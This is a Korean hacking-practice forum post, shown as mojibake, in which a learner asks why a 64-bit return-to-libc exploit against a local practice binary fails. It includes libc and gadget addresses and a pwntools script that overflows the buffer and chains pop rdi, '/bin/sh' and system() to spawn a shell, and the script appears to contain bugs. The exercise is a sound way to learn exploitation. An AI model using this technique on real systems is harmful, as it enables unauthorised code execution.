22016, 1/1101 ȸ¿ø°¡ÀÔ  ·Î±×ÀΠ 
   qw3709
   64bit RTL Áú¹®..

http://www.hackerschool.org/HS_Boards/zboard.php?id=Free_Board&no=36248 [º¹»ç]


¿¬½ÀÁßÀε¥ À߾ȵdz׿©.. µµ¿ÍÁÖ¼¼¿©


system : 0x7ffff7a60510
/bin/sh : 0x7ffff7b9b3f3
pop_rdi_ret : 0x555555554793

payload´Â

sfp(dummy 8byte)+ret(pop_rdi_ret 8byte)+/bin/sh+system
ÀÔ´Ï´Ù.


from pwn import *

p = process('./bof64')

base = 0x7ffff7a1e000
system = base+0x42510
binsh = base+0x17d3f3
poprdi = base-0x2aaaa24c986d

print "system : "+hex(system)
print "/bin/sh : "+hex(binsh)
print "pop_rdi_ret : "+hex(poprdi)

exploit = "A"*264
exploit += p64(poprdi)
exploit += p64(binsh)
exploit += p64(system)

p.send(exploit)
p.interactive


ÆÄÀ̽ã ÄÚµåÀÔ´Ï´Ù...
À߸𸣰ڽÀ´Ï´Ù µµ¿ÍÁÖ¼¼¿ä
  Hit : 10140     Date : 2018/06/19 03:54


    
     [°øÁö]ÇØÄ¿½ºÄð ÀÌ¿ë¼öÄ¢ 2021/04/11 ¼öÁ¤ÆÇ [55] ÇѽÂÀç 01/05 12290
22015   ÇØÄ¿ ¼±»ý´ÔÀ» ã½À´Ï´Ù     dydy44
 04/29 476
22014   ...     ÇØÅ·ÀßÇÏ°í½Í´Ù
 03/31 471
22013   ...     ÇØÅ·ÀßÇÏ°í½Í´Ù
 03/25 450
22012   15³âÀüÂë ÀÌ »çÀÌÆ® º¸°í ²ÞÀ» Á¤Çß¾ú´Âµ¥~~~     ambition65
 03/20 730
22011   À¸¾Ó!!![1]     ÇØÅ·ÀßÇÏ°í½Í´Ù
 02/05 600
22010   ¿À·£¸¸~     DarkSlayer
 12/11 788
22009   ÇØÄ¿½ºÄð ¿¾³¯ BGM[1]     wkfhddl4041
 11/07 902
22008   È÷À×...     ÇØÅ·ÀßÇÏ°í½Í´Ù
 11/02 758
22007   ¹ÙµÏ°ú Àå±â     ÇØÅ·ÀßÇÏ°í½Í´Ù
 10/30 826
22006   ³ª´Â ¾ðÁ¦ ¾ÖÀÎÀÌ »ý±â³ª¿è...     ÇØÅ·ÀßÇÏ°í½Í´Ù
 10/27 888
22005   Àü±¹ 1À§     ÇØÅ·ÀßÇÏ°í½Í´Ù
 10/27 843
22004   ´ã¹è ¤»¤»[1]     ÇØÅ·ÀßÇÏ°í½Í´Ù
 10/27 859
22003   ¸ÅÆ®¸¯½ºÀÇ ÆĶõ¾àÀ» ¾Æ½Ê´Ï±î..?     ÇØÅ·ÀßÇÏ°í½Í´Ù
 10/27 819
22002   ¤·¤·[1]     ÇØÅ·ÀßÇÏ°í½Í´Ù
 10/20 798
22001   ¿ÉÄ¡ ÇÙ°¨Áö ÇÁ·Î±×·¥Á» ¸¸µé¾îÁÖ¼¼¿ä[1]     powerima
 10/15 862
22000   ÇØÅ·ÆÀ¿ø ¸ðÁý[1]     koromoon
 08/27 1429
21999   °°ÀÌ ÇØÅ· ÆÀ ÀÌ·ç½ÇºÐ??     hacs98
 08/26 1003
21998   ¾Æ........ ¤Ð¤Ð     ÇØÅ·ÀßÇÏ°í½Í´Ù
 08/04 1333
21997   ±Í¼ö(Сâ¢) µû¶óÇϱâ(?)     ÇØÅ·ÀßÇÏ°í½Í´Ù
 07/28 1167
1 [2][3][4][5][6][7][8][9][10]..[1101]

Copyright 1999-2026 Zeroboard / skin by Hackerschool.org / Secure Patch by Hackerschool.org